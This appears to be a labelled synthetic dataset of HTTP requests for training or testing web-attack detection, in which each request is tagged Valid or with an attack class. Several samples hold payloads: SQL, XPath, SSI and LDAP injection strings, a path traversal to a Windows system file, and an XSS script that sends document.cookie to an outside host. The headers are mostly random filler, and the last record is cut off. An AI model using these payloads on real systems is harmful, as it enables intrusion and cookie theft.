Warning: 106 www.dh2mlt.jpeg "hscobuAtozegsiEt" "Fri, 20 Jul 07 24:32:32 CET"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18839
Start - Id: 35829
class: XPathInjection
GET /a./zsnaTarunrescbbydauo/x3UQN.php?ren7age0fnn=60++or+hatraT%2Fmrt%2Fnltits%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D828%5D+++++or++9871%3D&hwr=57 HTTP/1.1
Host: 203.181.90.116:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7, koi8-r;q=0.2, cp-936, windows-1255, windows-1251;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 48.181.108.67
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="38"
Date: Thu, 15 Jan 09 15:29:38 CET
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Fri, 16 May 08 13:29:10 CET
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: *
If-None-Match: *
If-Range: "OmzeiO7ZYkR6-EF1_t-"
Max-Forwards: 7
MIME-Version: 0.9
Pragma: eldfpwdt='zgkkEt'
Proxy-Authorization: Digest nonce
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 77-,-9
Referer: /oood/8yneei.sh
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/9.3 (X11; U; Solaris 6.2; sN-do; rv:2.6.8) Gecko/92298932
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: oCo/8.6 www.9eSnasaf.css:6
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 62972291005
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35829
Start - Id: 28466
class: Valid
GET /z_WhYE9-unionEdropdwa/eh8saN/2saiOgfn/eI4tcykeHgQ.9pEdfq/EbfySkmrunocnii6v/eN37G8j.m1/oalentsuhadouts/Scdeit2p/cBeGe3r.js?fia52stdrsltT6=bnot&Dmec=8472900&a5bh=0&9Abai0d9pnrAqos=HsNeos3rat HTTP/1.1
Host: 27.55.225.129
Connection: qars
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=22
Client-ip: 101.181.119.148
Cookie: ttPElrepwi67=47755594;a-m4C7HlIltF=911078
Cookie2: $Version="0"
Date: Thu, 10 Feb 05 24:54:26 GMT
ETag: "FtQPPMZUZcIvhY9I6XA-"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Sat, 31 Dec 05 16:02:04 CET
If-Unmodified-Since: Mon, 16 Nov 09 03:13:18 UTC
If-Match: "0dvFs-Ghvclb9w1UWz"
If-None-Match: *
If-Range: *
Max-Forwards: 51
MIME-Version: 1.7
Pragma: m='Eheedrr'
Proxy-Authorization: NTLM Q2xpdG5OcGhqaHVucWFoZmhlcmZOZ2UyZUhiZ2FwaWEwdXNBc29l
Authorization: Digest algorithm=mwewlos
Range: 51205-,399-
Referer: http://www.2eaPdnn.fr/cas8/n1atI/rn6rltn/npbo8ae/eomgfnfm.mdb
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 1.6; rD-io; rv:9.7.3) Gecko/19330984
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: 4.4 127.244.45.251:79, 4.3 202.150.245.130, 3.5 www.senRy.css
Transfer-Encoding: compress
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 717 213.77.249.79 "ztr6oRnm" 
X-Forwarded-For: 7.240.245.49
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 28466
Start - Id: 42730
class: SqlInjection
POST /lMmiaUftboth/lo1myS/winntTIf7ygB/x1bQ1UQQ7dHb/0Dyen-LDbjg6.aspx? HTTP/1.1
Content-Length: 253
Content-Language: rmmgea,jioahueN,oAlmtz
Content-Encoding: compress
Content-Location: http://wntsc.gov/lelnlo/thalo/elyefat/pefpaca/ns0o.mpeg
Content-MD5: dDI2Y3VwZGFLZXNud2FuNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Dec 04 15:41:38 CET
Host: 36.51.186.225
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, x-mac-cyrillic
Accept-Encoding: '    OR     'e6igxe'   = N' 
Accept-Language: *;q=0.8
Cache-Control: max-stale=640
Client-ip: 58.18.176.200
Cookie: vEreplacerP9EorhjL=Enc9genun%at e|A;EUeaoHn1beseu=r2%ttde
Cookie2: $Version="80"
Date: Wed, 07 Feb 07 07:04:15 UTC
ETag: "NbMe7oZgcJBmRk8"
Expect: 100-continue
From: 6ueuo@oyblbl9dec.biz
If-Unmodified-Since: Wed, 06 Jan 10 18:21:13 UTC
If-Match: "18xD6p2WGyDJSCPX"
If-None-Match: "CgHj.-oAvd03O.luiTT"
Max-Forwards: 599
Proxy-Authorization: Digest nc=53EA578F
Authorization: Basic ZTdlaGM6ZXN1Zw==
Referer: http://S74y.st/cdAqdus/etee/iEPw.cfm
TE: deflate;q=0.5,chunked;q=0.2,trailers
User-Agent: Mozilla/7.5 (X11; U; Linux i386 5.9; tc-ns; rv:5.7.8) Gecko/90806545
UA-OS: Win98
UA-Color: color32
Via: 3.2 www.rcfoa.html
Transfer-Encoding: identity

odbsa=cbyeLvdrNk&stAdmbo=1251&O5t=5565921690&pherlhs0vPebU=tiseusi4dsLe&tystwhssle=c-H&kcp=o&a3elptrd=yDl3z&itac1un0haa=7aAFeyStBnseycn&ahfm=ns+&ihLas9tkocw0oai=39&dstoedndftvshs=dmpLieeSdtlEWvriph&hronmioi9wtmm=hicdSr6rdo5ionsin&aQrstdinD=t&OnSq23R=8

End - Id: 42730
Start - Id: 35012
class: SSI
GET /tec4ess/Ei/sf4Qcy6JxRYU/rb76zJ3IdsbV_FtM/id3tSZ8V8I3Gk/lsS1IJeF2SlJm.jpeg?t2reisda=195dQUnq&eya=i1apdhan&ec1=th-klFsN.Cn.&yrvRhdi=+xTd%27&Dboepnr=7&tesasii=ti%28ix5T+tsienrrNng&titt=790&ts2tfodmugmdd=%3C%21--+%23odbc++statement+%3D%22select+++++vesR%2C++ini%2C++moaOdrln++from+++++nee4tejsq++order+++++by+3%2C+328%2C+++++0%22++--%3E&prns2enuthcgt=195573445&rNhollihckeeesb=23105487&eservicesXu0avPuUIU-=61 HTTP/1.1
Host: www.aj7n.de
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.1, hz-gb-2312;q=0.4
Accept-Encoding: identity, compress;q=0.2, gzip, deflate;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-cache
Cookie2: $Version="855"
Date: Fri, 26 Aug 05 02:00:10 UTC
ETag: "kgVDGLWKeSMiPzl1"
If-Modified-Since: Mon, 16 Nov 09 06:52:58 UTC
If-Unmodified-Since: Mon, 01 Dec 08 22:12:59 CET
If-Match: *
If-Range: *
Max-Forwards: 4
Authorization: NTLM U3RhYzI3aWV3bnJpd2lHaW5jdXNmdG5lYUFsczA3aWVyaWlyaWVjcw==
Range: 4978-84,830195-719467,3968-5663
Referer: /iotr/ctee5/tsetiwoa/dnhleb/soelde.asp
TE: deflate,chunked;q=0.0,trailers
User-Agent: 9p@C-POQX http://www.ieqNlta.biz
Via: 9.8 40.97.137.62
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35012
Start - Id: 29916
class: Valid
GET /ZadminO_ITyjDSOB/OWae3/ffqYuOgPiWbRli/rsHLMnoVn02t/pVnwq_IG.9/lG576Fc/csfvUoD/oetv0Hmtsete/dcastdidan/eVTVR5Hkz/eeqXk6w7nN/tKrIzVYNK4226Y@LE.exe?C_zxp_systemeFeps=6-.U&8yQbQKJ-=%5D+C&5c4rzEIwO=343316&Msoiohew=1921644&mntwv=3236567&c5yyteih=4%250a1a&oenileee=77088083&tmninAuy4An1o=7ataioouz%26%292t&pUom9h=eo%2Fs829s&stttrwgg7i=p3tuoS%40qScN&sqxn=9&hd=d7%2BIf&QNkpYSpPweRE=%7Cf HTTP/1.0
Host: www.trpthfdd8h.cz
Connection: cfestue
Accept: */*
Accept-Charset: iso-8859-6;q=0.5, iso-8859-3
Accept-Encoding: 
Accept-Language: qwonhont-gudeuz
Cache-Control: max-age=3
Client-ip: 79.195.73.143
Cookie: em7lieh=1698135
Cookie2: $Version="15"
Date: Tue, 09 Jan 07 06:49:54 UTC
ETag: W/"7MRCAMCo4sZHzVITp"
Expect: 100-continue
From: ait7ghaw@iar3a.ch
If-Modified-Since: Thu, 14 Sep 06 15:19:06 UTC
If-Unmodified-Since: Sun, 23 Jan 05 24:48:57 CET
If-Match: "Ot8WDR3KHAJx7hT3d"
If-None-Match: "TC.cikmcZX3r8AIh5RO"
If-Range: Thu, 10 Feb 05 20:36:57 UTC
Max-Forwards: 78
MIME-Version: 0.6
Pragma: aiannm8s=ta
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: giiOst melen=sou1ni
Range: 73-062771
Referer: /bhe8ne/Uvnoc.mp3
TE: trailers,deflate,chunked
Trailer: Pragma
User-Agent: ztE2ioaj6bp9dsie
UA-CPU: 68000
UA-Disp: 5197,782,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3101x221
Via: HTTP/0.5 www.sidi.png, 2.7 58.244.93.248, 4.9 180.189.164.135
Transfer-Encoding: Unga; e1eka=snrAe
Upgrade: ret/7.4, bme/7.9, an2ule/1.8, hcaisH/5.5
Warning: 601 103.90.185.56:00009 "bInvy9od2reoewohbO" "Thu, 26 Mar 09 12:32:40 UTC"
X-Forwarded-For: 24.63.210.94
X-Serial-Number: 89410
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29916
Start - Id: 31849
class: Valid
GET /n6@q2jlNpc1GdarfgWI/rz6wfzHPDl6B8Z/oo6u.css?Ete=3hltacceptuon&JnnuhcEeeae8i4p=aEd8dtrcdlirtoktn HTTP/1.1
Host: 53.99.126.85
Connection: ciyatr8
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 239.40.123.252
Cookie: HToOotIepn=hoid~xeEiZ%weh;nodeEKlFt0A1=ib;TN=9884850569;9JGFDZF1x=3hoVe>rncad
Cookie2: $Version="0"
Date: Wed, 10 Dec 08 05:58:13 CET
ETag: "pRAw-lDREXdikE39iG"
Expect: 100-continue
From: dTummj@ncsar.de
If-Modified-Since: Mon, 24 Jan 05 05:39:58 UTC
If-Unmodified-Since: Mon, 17 Dec 07 12:21:07 CET
If-Match: "_HQXw_BR_ND7_MRK3G_n"
If-None-Match: "zMP3dQtF5-E.B024DNO"
If-Range: Tue, 29 Jul 08 02:52:48 UTC
Max-Forwards: 5395
MIME-Version: 2.6
Pragma: ltormtl=t
Proxy-Authorization: NTLM TzB5dXJPcklpZG5lZXR0YzJ0OXczZXNucTh0bXRhZW5Rcm5tYTJ0ZHN0eHVpaQ==
Authorization: NTLM cDVBZTdxZ29odGVhZHRoZnBuZXNoQWFyc3ltZG9ZdG1l
Range: -86
Referer: http://atcs.be/iqm6w/dhntne/9date/nucsne/wtimFS.doc
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 1.0; ti-tn; rv:9.8.4) Gecko/29622735
UA-CPU: Sparc
UA-Disp: 753,4459,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 2241x014
Via: HTTP/2.5 13.198.225.135, HTTP/0.7 www.5nrs3d.html, 8.5 155.182.134.119
Transfer-Encoding: compress
Upgrade: emhps/3.5, Steh/4.0, aieted/4.2, iro9te/2.8, are/6.4
Warning: 646 www.te98Thcn.htm "7aNme" "Fri, 30 Jun 06 06:54:15 CET"
X-Forwarded-For: 236.36.151.129
X-Serial-Number: 69375200108238652611
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31849
Start - Id: 46930
class: XSS
POST /adqtMHEwo/ard4sict.bin? HTTP/1.1
Content-Length: 257
Content-Language: ae7d,a
Content-Encoding: compress
Content-Location: http://www.oduot.uk/Oico2/seclo.htm
Content-MD5: NmFpZHJoNmRpSXNpd09UYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Jun 04 09:50:06 GMT
Last-Modified: Mon, 21 Jul 08 20:59:21 CET
Host: 133.233.5.191:80
Connection: keep-alive
Accept: image/png;q=0.2, audio/x-wav;q=0.6, text/html;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eOer-z6iEreo
Cache-Control: 3tt='9iroTOa'
Client-ip: 76.30.12.210
Cookie: srT38onu=5890
Cookie2: $Version="688"
Date: Wed, 07 Jan 04 18:18:35 UTC
ETag: W/"@EO1@@IWjcaKk@I8WI82"
Expect: Loer=fteWoeui
From: iadhhX@vmafir.de
If-Modified-Since: Wed, 03 Mar 04 23:49:43 UTC
If-Unmodified-Since: Thu, 02 Jun 05 02:46:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 1.5
Pragma: qldA=i3ones
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: Digest realm
Range: -80,-788
Referer: /esuserr/lstJaw/hSoC/i8mvloaq.sh
TE: gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: a4jrLgaj (6E.2TwmD)
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 133 128.21.84.17 "ewraoseeFm" "Fri, 27 Feb 04 19:29:24 CET"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

stezIenw83erano=doK&jtnlIqoykbote=<style  ><!--</style   ><script  >[document.location.replace    ('http://www.ll.com/cgi-bin/olin.cgi'+document.cookie);]//--></script >&2rbEyr0sulee=tslhleatmnnc32ssoE

End - Id: 46930
Start - Id: 1404
class: Valid
GET /hUr_iG@/48huwDnNuRe4xanW/9xfe9emb0e1/hGo..W9B4qrnKKP5OA/7G5iframeHRK/tjgNtj5dcM5YlR-E/lTltsGcnaoh7inl/t-W4xwz/ng4dh7thvdTlrarobd/tmp@.ylogZxsGYn@FH/iLw2atv2/saecen.mdb?unionFJL5cat=eTDtrsisa&rwwbPw=%3C%2B&pSujfmtnNets6se=dbBua&8oJni=2932267&9i6gAgtcqjHc=me&euseIndHmoteef=04&0tmp9wbBguE=cnntnimt&apt=9026&i9QxWCuC=aMI_&e2vpht1=tn0bs%7Eimoherr3%29&e2tnnleepkt0st=%29g1mgexterm%3Agc+f&sinclude6BQicZb=hd+d+fe&daealiev=tbtees0nfynefeep5 HTTP/1.1
Host: www.hdetpei.it
Connection: close
Accept: text/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 145.43.119.173
Cookie: n0o=952808954;sj=uLeqmD-ft-ub;5M09h-=1tr-ulN4ott;eonmaheutatdt=yyxbdbc4wx;ntkito=JptD;eRyifeoloeEeiai=thg
Cookie2: $Version="912"
Date: Mon, 23 Oct 06 19:27:44 GMT
ETag: "3YvwRJfRSCNjWREyB9"
Expect: 100-continue
From: aihr@oos5lle.org
If-Modified-Since: Tue, 09 Sep 08 12:06:16 UTC
If-Unmodified-Since: Fri, 26 Aug 05 05:45:28 UTC
If-Match: "0PrVauYlx-_TFUC1-g"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: s3a9ty dgws=1v3t
Authorization: pcbheW Tcione=uoofn
Range: 23171-440
Referer: http://0dDd4me.com/p5eNac/cr5e2E.html
TE: gzip;q=0.9
Trailer: Proxy-Authorization
User-Agent: enimtr (etCTpx0.eR; iQSxhJC; vA-V32tU)
UA-CPU: PowerPC
UA-Disp: 018,1433,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 238x900
Via: nror/1.7 www.vTl8yg.tiff, HTTP/6.7 163.67.18.86:23
Transfer-Encoding: identity
Upgrade: hwleo/8.7, hrph/7.2, dnoxhi/9.3
Warning: 489 183.90.152.227 "d7uba" "Fri, 23 Jul 04 21:39:57 CET"
X-Forwarded-For: 166.217.103.151
X-Serial-Number: 1347008
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1404
Start - Id: 41195
class: SqlInjection
GET /sa7Aotrte6k/sJ/iK/ecrEAYOEbs.mspx? HTTP/1.0
Host: www.c9in.cz
Connection: uytihchn
Accept: text/plain;q=0.0, video/*;q=0.4
Accept-Charset: x-mac-greek, windows-1254
Accept-Encoding: select  tngga   from  ALL_USERS
Accept-Language: a-uny, ia-cASSl, hekihce-birtu9
Cache-Control: ilotstu4=0aeepee
Client-ip: 75.232.65.99
Cookie: fhuV=423276
Cookie2: $Version="63"
Date: Tue, 11 Dec 07 16:24:01 UTC
ETag: "ezIG42THo_ffX4QA2V"
Expect: ewi8imt=Eenc
From: si5oWe@dosta.biz
If-Modified-Since: Mon, 23 Feb 04 02:50:53 CET
If-Unmodified-Since: Tue, 05 Jul 05 20:44:58 CET
If-Match: *
If-None-Match: "IDvKLHD.HOVml1XGxW"
If-Range: "pUshpopQkg28y3d"
Max-Forwards: 3819
MIME-Version: 9.8
Pragma: e='onya'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: Basic aHNyczF1dEg6aWVzYQ==
Range: 0731-3915
Referer: http://aaofns.biz/7ndeina0/nee0ea/teroeia2/eEceei.jpeg
TE: trailers
Trailer: Referer
User-Agent: Mozilla/1.4 (Windows; U; Win98 0.7; eh-br; rv:6.9.4) Gecko/65998060
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: 2.9 71.4.185.68:81, 0mshp/5.6 www.s6xet.htm:04450
Transfer-Encoding: identity
Upgrade: palt/3.5, ine2/0.4
Warning: 985 www.enaw.tiff "drga" "Tue, 12 Feb 08 13:07:34 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41195
Start - Id: 17074
class: Valid
GET /92topa8XT/sunionAinputuC8/ihts7rhtodTnnk2/hSoEQR6k/yIfKvzTJyomV/nRARH6TmJP4k8F26nl/tnNnefTMYo/1ny2VF5.ir.6RHpP/ceewau/epie6Ihlmu8tz/fTOpmA4x.shtml?d1=ke+aO&euhhio=a2scrta HTTP/1.1
Host: www.Szm1tcH2g.net
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eur-aRr
Cache-Control: max-age=5
Client-ip: 187.180.35.173
Cookie: ooirtinurbhesm6=tsmhucho-6g?ite;siwoebt=8V-Bn0.
Cookie2: $Version="908"
Date: Thu, 07 Sep 06 19:52:34 UTC
ETag: "9h8i-WTEHWebHCHr6-q"
Expect: uysn=4XBe
From: tCTeli@niOaihobe.biz
If-Modified-Since: Mon, 16 Feb 09 09:40:57 GMT
If-Unmodified-Since: Mon, 27 Aug 07 14:49:35 CET
If-Match: "fyDGnpd@kTD7UOWZNqs"
If-None-Match: *
If-Range: Wed, 29 Aug 07 19:36:19 GMT
Max-Forwards: 8024
MIME-Version: 4.5
Pragma: gmtii=uonmy
Proxy-Authorization: Basic aHZzaGRuaU46cndvdGFk
Authorization: Digest opaque="2ttca"
Range: 36592-9391,93359-42748,61842-4696
Referer: http://www.e5z4ab.st/add7Tl/uadp/mie4egtN/v8bLy/orva.ace
TE: trailers
Trailer: User-Agent
User-Agent: wsgms/7.1
UA-CPU: StrongARM
UA-Disp: 7520,867,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: myp/4.7 13.99.84.161:008, 6.9 www.aswl.js, HTTP/9.1 145.202.39.220
Transfer-Encoding: ntob3; Peeus9o=oaeno5kE
Upgrade: nuti/7.7, 4TEs/2.1, 4nqais/2.3, baaiD/4.1
Warning: 191 166.68.140.162 "eaVlncoAlolfhrlu" "Fri, 18 Sep 09 07:53:36 CET"
X-Forwarded-For: 185.99.110.242
X-Serial-Number: 7467351348661149329
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17074
Start - Id: 9447
class: Valid
GET /oa/bgbOTRNvg-zH/6tmetaV2-QlibtelnetGR/riy9nettnirnf/unmOpbYgU/ianeonaibisitljlStoe.css? HTTP/1.0
Host: 65.220.241.249
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-8, x-mac-ce;q=0.7, iso-8859-15;q=0.2
Accept-Encoding: identity;q=0.0
Accept-Language: hyOz2ys-nsNcd;q=0.1, E-xsno8okh;q=0.7
Cache-Control: max-age=935
Client-ip: 112.34.95.51
Cookie: M8ZjWCzlEyWp=53273;Edfulpe=tPKuk.;gatetjhv=t?a;ochildTL=7361105820;nmgtuoLtfTdtn=ssslnechokeaa7  
Cookie2: $Version="00"
Date: Fri, 09 Jun 06 12:00:50 UTC
ETag: W/"@8QA_vWMBay-vYqC"
Expect: 100-continue
From: ieue@hoegnHqytl.be
If-Modified-Since: Sun, 18 Jul 04 21:38:01 UTC
If-Unmodified-Since: Sat, 30 Apr 05 09:45:28 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Mar 08 15:52:24 GMT
Max-Forwards: 54
MIME-Version: 4.1
Pragma: adtt=rn
Proxy-Authorization: uide iwlucnv=bfge1or
Authorization: Digest username="edfr"
Range: -361938
Referer: http://Ot9ebddi.biz/ditt.msf
TE: deflate;q=0.7,chunked,trailers
Trailer: Date
User-Agent: Mozilla/5.6 (Windows; U; Win98 7.5; nh-49; rv:8.8.8) Gecko/46263958
UA-CPU: Sparc
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 383x664
Via: 0.9 19.127.153.95, HTTP/5.6 144.101.120.231, 6.3 110.31.100.113
Transfer-Encoding: gzip
Upgrade: 2saP/8.1, hoai/5.7, rttsrq/0.0
Warning: 339 144.218.59.163 "gnvogsawxtUq" 
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9447
Start - Id: 45410
class: PathTransversal
PUT /epw3cAYasrqsebae/opiVP2gDaZZA/t8/o_bTTkWXh/tlrJSirgh88N/yp2F/2-Noq89rwx-/U_/tV4Fprocessing-instructionna.aspx? HTTP/1.1
Content-Length: 238
Content-Language: toyndalo
Content-Encoding: deflate
Content-Location: /3er1/iwSdo.cfm
Content-MD5: dDF0QWhrSWlkcmJoYU9ydA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 24:09:24 UTC
Last-Modified: Fri, 28 Mar 08 10:03:27 UTC
Host: www.toocd.org
Connection: keep-alive
Accept: video/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 204.131.31.4
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="227"
Date: Mon, 09 Apr 07 01:27:20 CET
ETag: "h2GELE9QWj0NUvazBiN"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 28 May 05 04:10:57 UTC
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: "BJK1E5uAl2OI86@Oo"
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: Tue, 31 Oct 06 07:47:17 CET
Max-Forwards: 93
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM dHh0cndJZTlyZXRyb3NvZXNvdm9hbDVGb0hhclY3aGw=
Authorization: Digest uri=/rerrx/d7rscBo.bin
Range: 87099-46335,-99
Referer: http://2erik.be/egkPdeo.conf
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.0 (Windows; U; Win98 9.2; t2-qn; rv:8.0.8) Gecko/69401970
UA-CPU: PowerPC
UA-Disp: 9471,9312,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 863x2272
Via: 4.3 www.lieir.js:2558, 1.1 201.241.148.50:59
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t9kts=\WINDOWS\system.ini&8v8foatLara=75HWo&Lrm0WG=lds2idikrIttoaGr&aoei8iasi8=w%usa&strMfnsleearnr=9&arjWw=UirKneeppbneseh&u5edm3ed=8850872554&4plEl1reSr=3mxUoraxMyG_&DNwieh6B4ToEysh=e$r&3gcKmocha=hVDwIN-ptj&gatrEenRrnesae=405133

End - Id: 45410
Start - Id: 32038
class: Valid
GET /wBCrFpexec57e./FRuNZyn.jpg?ry=h9Wt3YMvf&e7purdameg=hOyKjREhOK&iricYiestoteHdd=amv&oesthe29rui0Io=4309075&9ehlr=k7Oow5BEW&Nci=91075&iess7l=dyn8Vr60moos&djrdya5emablrr=lsln2OHsAy&abrIs=100999056&mahheDsndfolwta=h7tng%3Ela&sluseNejl4=41&HnY1g=I&neoahief=tqMro&Ssq8etrn=1794132&ufEtEiwis=whWGmmaI02- HTTP/1.1
Host: www.dtR9esssps.biz
Connection: 8qssh4
Accept: audio/x-wav;q=0.6, text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: identity, gzip, compress;q=0.6, identity, gzip;q=0.2
Accept-Language: eees-bioseeY, nyat-hsss8k;q=0.3, hitgweor-va4se2s2;q=0.8, EabrC-c;q=0.0
Cache-Control: min-fresh=07
Client-ip: 212.189.3.187
Cookie: ion=linktA6;8Hcsost0=i5nMP;znYJK=execl
Cookie2: $Version="7"
Date: Fri, 09 Jul 04 22:58:40 CET
ETag: "rMby0oEYpb43U340YH"
Expect: 100-continue
From: hMpeNchu@otttmeoI6.st
If-Modified-Since: Fri, 21 Dec 07 19:05:14 CET
If-Unmodified-Since: Wed, 02 Nov 05 05:34:14 UTC
If-Match: "awvr4PPjRQqPd_X"
If-None-Match: "VR8kxpSdkMB-..tGcI"
If-Range: Sun, 12 Jul 09 11:50:24 GMT
Max-Forwards: 9672
MIME-Version: 3.7
Pragma: eesont=t
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic YXRlSHliaGU6aXVuaEVvdHQ=
Range: 23518-
Referer: /ytcu8Bki/IrrsN/6Isazb.mpg
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 7.6; ds-se; rv:0.4.6) Gecko/79236248
UA-CPU: x86
UA-Disp: 097,6604,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8661x2250
Via: rt1i/7.5 63.13.60.4, est0s/7.4 80.187.155.7:8140
Transfer-Encoding: identity
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32038
Start - Id: 37358
class: LdapInjection
GET /mrTyD-IuCr5_mboQ-AUe/aJsyE.pVK4.pbBy5zh9.php?mlaruee8oeNl=pphp5&rTQj6IV2._xA=64170&itynwe6ttEo=9ler&epamooHOmohos=3502450223&lsuoyl2r=Jtinm%5D%2F-ostdina&irs0gon=+s%3Deij%2F%40yoe%3Behm2d+wgete&slZts=90459939&oSsbdJV4A=moHtwsdhx&tEpki9m9r=121050&ro8aZloa=ep-1ga.aQ&eea=elm%3Fa%7Etb&Uu1ncwhereSpshutdown=m7O4&xahdi=da6qXk-bg6&xzthap=8186352&bdv=4 HTTP/1.1
Host: www.l1rae6.de
Connection: yfoq
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: only-if-cached
Client-ip: 212.91.230.42
Cookie: hhoqozkstg8xsh=02;irlni=rcpxeo0twhe7cr
Cookie2: $Version="87"
Date: Sat, 04 Aug 07 01:49:22 GMT
ETag: "_hZuj7xV2Cnv6KHHV4bB"
Expect: 100-continue
From: 6eoetp@selEd.fr
